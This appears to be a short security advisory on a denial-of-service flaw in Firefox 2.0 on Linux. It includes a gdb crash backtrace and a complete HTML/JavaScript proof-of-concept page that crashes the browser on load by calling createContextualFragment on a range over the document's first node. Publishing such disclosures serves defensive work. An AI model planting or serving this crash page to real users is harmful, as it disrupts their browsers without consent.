Summary
Mozilla Firefox is a free, open source, cross-platform, graphical web browser developed by the Mozilla Corporation and hundreds of volunteers.
The latest version of Firefox contains a denial of service vulnerability.
Credit:
The original article can be found at:
http://security-protocols.com/poc/ff2_death.html
Details
Vulnerable Systems:
* Firefox 2.0 on Linux
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1221474080 (LWP 31536)]
0x081d98ee in nsWritingIterator<unsigned short>::advance ()
(gdb) trace
trace command requires an argument
(gdb) backtrace
#0 0x081d98ee in nsWritingIterator<unsigned short>::advance ()
#1 0x083b4d8f in nsReadingIterator<unsigned short>::advance ()
#2 0xb7f2a39b in XPTC_InvokeByIndex () from /usr/lib/firefox2-manual/libxpcom_core.so
#3 0x080a6960 in nsTHashtable<nsBaseHashtableET<nsDepCharHashKey, nsAutoPtr<nsINIParser::INIValue> > >::~nsTHashtable ()
#4 0x080ac53a in nsTHashtable<nsBaseHashtableET<nsDepCharHashKey, nsAutoPtr<nsINIParser::INIValue> > >::~nsTHashtable ()
#5 0xb7f86ed6 in js_Invoke () from /usr/lib/firefox2-manual/libmozjs.so
#6 0xb7f8b80d in js_Interpret () from /usr/lib/firefox2-manual/libmozjs.so
#7 0xb7f86f91 in js_Invoke () from /usr/lib/firefox2-manual/libmozjs.so
#8 0xb7f87374 in js_InternalInvoke () from /usr/lib/firefox2-manual/libmozjs.so
#9 0xb7f64854 in JS_CallFunctionValue () from /usr/lib/firefox2-manual/libmozjs.so
#10 0x0843dbb7 in nsReadingIterator<unsigned short>::advance ()
#11 0x0846b6d9 in nsReadingIterator<unsigned short>::advance ()
#12 0x083c9724 in nsReadingIterator<unsigned short>::advance ()
#13 0x083c9b4b in nsReadingIterator<unsigned short>::advance ()
#14 0x08442204 in nsReadingIterator<unsigned short>::advance ()
#15 0x0826f4e7 in XmlInitUnknownEncodingNS ()
PoC:
Following this link will crash Firefox:
http://security-protocols.com/poc/ff2_death.html
Exploit:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;
range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>